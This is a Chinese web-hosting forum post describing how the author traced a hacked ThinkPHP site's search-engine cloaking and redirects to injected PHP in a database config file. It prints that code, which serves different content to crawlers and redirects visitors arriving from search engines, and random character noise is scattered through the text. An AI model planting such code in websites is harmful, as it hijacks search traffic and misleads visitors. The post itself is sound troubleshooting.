阿里云
云栖大会资料下载
发表主题 回复主题
  • 1925阅读
  • 2回复

[基础常识]查找网站访问被跳转到其它网址原因一例

级别: 论坛版主
发帖
12156
云币
27585

— 本帖被 不靠谱贝贝 设置为精华(2017-08-24) —
感谢“***zy”的鼓励和支持。 =*O=E@]  
{]`p&@  
一网友说他的网站被“黑”了,现象是,在搜索引擎里搜索网址,收录的首页是一个X彩的网站内容,且点击搜索引擎链接进入网站,会随机出现一些其它站点的内容。但直接在浏览器里输入网址就正常。 U<[jT=L  
B)6#Lp3  
过程: i4<BDX5  
O,|\"b1(  
1. 在网上搜索了一些资料,说有可能是根据访问者的 http User Agent 和 http_referer 来跳转或显示不同内容的 ?mU\ N0o  
Xu#:Fe}:  
|1Hc&  
CW-Ae  
^C7C$TZS  
DW|vMpU]u  
2. 同一台服务上的另一个站点不会出现类似的现象,所以就重点看发生问题的站点文件 4,~tl~FD  
C ) ?uE'  
3. 站点是用 ThinkPHP 框架写的,尝试替换 ThinkPHP 的文件内容,无效 g<a<*)&  
j5^-.sEEw  
4. 尝试替换 app 里的内容,也是无效 0x~`5h  
){ gAj  
5. 鼓捣了很久(我是门外汉,不懂php编程和网站的安全运维),无意中,看到日志文件中出现 NOTIC: [8] Undefined index: HTTP_REFERER 的字样 k.GA8=]>  
b\giJ1NJB  
,Sg33N ?  
8TPN#"  
6. 找到相应的文件,有以下php代码 si(cOCj/  
6Dst;:  
  1. <?php
  2. $arr = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  3. for($i=0;$i<count($arr);$i++){
  4.     if (ereg($arr[$i], $_SERVER["HTTP_USER_AGENT"])) {
  5.         $file = file_get_contents('http://bbs.aliyun.com/');
  6.         echo $file;
  7.         exit;
  8.     }
  9. }
  10. $arr1 = array('baidu','360','so','Sogou','bing','yisou','sm','google');
  11. for($j=0;$j<count($arr1);$j++){
  12.     if (ereg($arr1[$j], $_SERVER["HTTP_REFERER"])) {
  13.         Header("Location: https://www.aliyun.com/");
  14.         exit;
  15.     }
  16. }
  17. return array (
  18.   'DB_HOST' => 'localhost',
  19.   'DB_NAME' => 'dbname',
  20.   'DB_USER' => 'dbuser',
  21.   'DB_PWD' => 'dbpassword',
  22.   'DB_PORT' => '3306',
  23.   'DB_PREFIX' => 'xxx_',
  24. );
e_rzA  
!` 26\@1  
7. 注释掉怀疑的代码(return array 上边的)后测试,正常了 @G*.1;jO  
x=*L-  
参考:《网站被黑检测》 - http://s.tool.chin az.com/tools/webcheck.aspx
[ 此帖被dongshan8在2017-08-23 16:44重新编辑 ]
关键词: 跳转
Debian 是一个自由的操作系统 (OS),提供您安装在计算机上使用。操作系统就是能让您的计算机工作的一系列基本程序和实用工具。
级别: 禁止发言
发帖
52
云币
71
只看该作者 沙发  发表于: 10-05
用户被禁言,该主题自动屏蔽!
级别: 小白
发帖
22
云币
28
只看该作者 板凳  发表于: 10-11
Re查找网站访问被跳转到其它网址原因一例
感谢分享
发表主题 回复主题
« 返回列表上一主题下一主题

限100 字节
批量上传需要先选择文件,再选择上传
 
验证问题: 56 - 24 = ?
上一个 下一个